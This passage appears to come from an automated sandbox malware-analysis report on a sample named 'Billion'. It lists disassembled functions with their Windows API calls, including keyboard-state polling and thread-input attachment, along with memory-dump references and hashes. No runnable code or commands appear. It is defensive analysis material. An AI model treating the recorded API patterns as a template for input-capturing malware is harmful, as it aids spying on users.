                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92573a51cbd55c746ab1794d6c57c454e61de539c3b4c8795316eaf4be879a36
                                                                                                                                                                                                                                                                                                          • Instruction ID: ecdb75fc9edcaa4ed45f9327b19e00d38ee22b16a05aae9277dcc7ae38764644
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92573a51cbd55c746ab1794d6c57c454e61de539c3b4c8795316eaf4be879a36
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BC10A79A00205EFDB14DFA4C884DAEBBF5FF49304B1484A9F9199B661DB30ED45CB90
                                                                                                                                                                                                                                                                                                          Function 00190378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0019039F
                                                                                                                                                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 001903F8
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0019040A
                                                                                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0019042A
                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0019047D
                                                                                                                                                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00190491
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001904A6
                                                                                                                                                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 001904B3
                                                                                                                                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001904BC
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001904CE
                                                                                                                                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001904D9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 644b17c62c024f1522f10fb02515f7672d1ec84463d29bc3c2e85c0d46d53dc7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5ef7dfa20ae2e36539b5ff62fc60b273fa6d73d2f47ca0e2fc70aebd87e2c7eb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644b17c62c024f1522f10fb02515f7672d1ec84463d29bc3c2e85c0d46d53dc7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46416E75A00219DFCF05DFA4D844DAEBFB9FF18344F018029EA05A7661DB30EA85CBA0
                                                                                                                                                                                                                                                                                                          Function 0019A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019A65D
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0019A6DE
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0019A6F9
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0019A713
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0019A728
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0019A740
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0019A752
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0019A76A
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0019A77C
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0019A794
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0019A7A6
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c8914b37ff486c5e1ee7aa692a39d8df0bf8d50dfa28b61fe1dad5b1a885a28
                                                                                                                                                                                                                                                                                                          • Instruction ID: 013f786b21a666a163a7d1971878d702d4fad5fc227d69bb193a1ff1c870dbf7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c8914b37ff486c5e1ee7aa692a39d8df0bf8d50dfa28b61fe1dad5b1a885a28
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 514106745047C96DFF398BA098057A5BEB0AF11308F88805DD6C64A6C2EBA59DCCC7E3
                                                                                                                                                                                                                                                                                                          Function 001B9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                          • Opcode ID: 60a02808a8b2004dd2988a9c890cb4cf7a2f252b2342c8d6f8b131819658b999
                                                                                                                                                                                                                                                                                                          • Instruction ID: b019cc4b2420ba20962904a7d114df8a574a9560277a4c246c9a67e6181edafd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60a02808a8b2004dd2988a9c890cb4cf7a2f252b2342c8d6f8b131819658b999
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7951E531A0411A9BCF14DFACC9909FEB7E5BF65364B204229FA66E7284DB31DD42C790
                                                                                                                                                                                                                                                                                                          Function 001B4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32 ref: 001B41D1
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001B41DC
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,001D0B44,?), ref: 001B4236
                                                                                                                                                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 001B42A9
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001B4341
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001B4393
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                          • Opcode ID: c95df7697d6a70578f4761e055d4c384fdfac4e863f592eb44f4e9ee5311ed58
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97a5d7df2bad070947d30f819aba5fecfd080c6438cd02a1a8422eae88b33c3a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c95df7697d6a70578f4761e055d4c384fdfac4e863f592eb44f4e9ee5311ed58
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6061CE70608311DFD710DF64D889FAABBE4BF49714F044859F9819B2A2CB70ED44CB92
                                                                                                                                                                                                                                                                                                          Function 001A8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 001A8C9C
                                                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A8CAC
                                                                                                                                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001A8CB8
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A8D55
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8D69
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8D9B
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001A8DD1
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8DDA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: e7850b6dbc419879b669930de08cdc3753da98b449ede8a89e388f7c01e47085
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7253b400ced83973a13b101656e6fa4032cb164375a7ef21c16bdbe6f58e1d47
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7850b6dbc419879b669930de08cdc3753da98b449ede8a89e388f7c01e47085
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73615BB6504305AFCB10EF60C845AAEB7E8FF99324F04482DF999C7251EB35E945CB92
                                                                                                                                                                                                                                                                                                          Function 001C46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateMenu.USER32 ref: 001C4715
                                                                                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 001C4724
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001C47AC
                                                                                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 001C47C0
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001C47CA
                                                                                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001C47F7
                                                                                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 001C47FF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                          • Opcode ID: d0870b404ad8d2179811b323411a93ff8b54738e9cb6405be62a960b9bda9172
                                                                                                                                                                                                                                                                                                          • Instruction ID: e1fa0643c760f68ad9d083684349b604f68dccf89de6afc2ed76ab66b5d68cc0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0870b404ad8d2179811b323411a93ff8b54738e9cb6405be62a960b9bda9172
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9415375A01209EFDB24CFA4E998FAA7BB5FF19314F14402DEA46A7360C770E914CB50
                                                                                                                                                                                                                                                                                                          Function 0019282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001928B1
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 001928BC
                                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 001928D8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001928DB
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 001928E4
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 001928F8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001928FB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ea760b8d949394b9e17a735ab2977ae18e6014dc519f4ed1d6726807587f8a8
                                                                                                                                                                                                                                                                                                          • Instruction ID: d4f92c960ee43d6cba6ce78f76e2edf60beec869267c7bdcdc6f7c820241dd03
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea760b8d949394b9e17a735ab2977ae18e6014dc519f4ed1d6726807587f8a8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821D474900128BBCF04AFA0DC85EEEBFB4EF15314F000166F951A7291DB398849DB60
                                                                                                                                                                                                                                                                                                          Function 0019290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00192990
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0019299B
                                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 001929B7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001929BA
                                                                                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 001929C3
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 001929D7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001929DA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5ef7f716cbbb91ed1f2c38c1f53118099a4f69803b614665ca564c4aad95e302
                                                                                                                                                                                                                                                                                                          • Instruction ID: 55ddd0033aab8cf6cbc895a30ae474190e5201e085249430652eb1d8767613b6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ef7f716cbbb91ed1f2c38c1f53118099a4f69803b614665ca564c4aad95e302
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221C3B5E00228BBCF05ABA0DC85EFEBFB8EF15304F004056FA51A7291DB759849DB60
                                                                                                                                                                                                                                                                                                          Function 001C44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001C4539
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001C453C
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C4563
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001C4586
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001C45FE
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001C4648
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001C4663
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001C467E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001C4692
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001C46AF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: be8384031bbc29f708f82bd8c0386edd5e5d9dcafa91c2f1d43faa1b822b4db1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c13c920f2cba6a4b2607c1bb254e37d1317c6e59dabfb092bd0612ae26cf112
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be8384031bbc29f708f82bd8c0386edd5e5d9dcafa91c2f1d43faa1b822b4db1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0618975A00218AFDB10DFA4CC85FEE77B8EF19300F10415AFA14A72A2D774E989DB50
                                                                                                                                                                                                                                                                                                          Function 0019BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0019BB18
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB2C
                                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0019BB33
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB42
                                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0019BB54
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB6D
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB7F
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BBC4
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BBD9
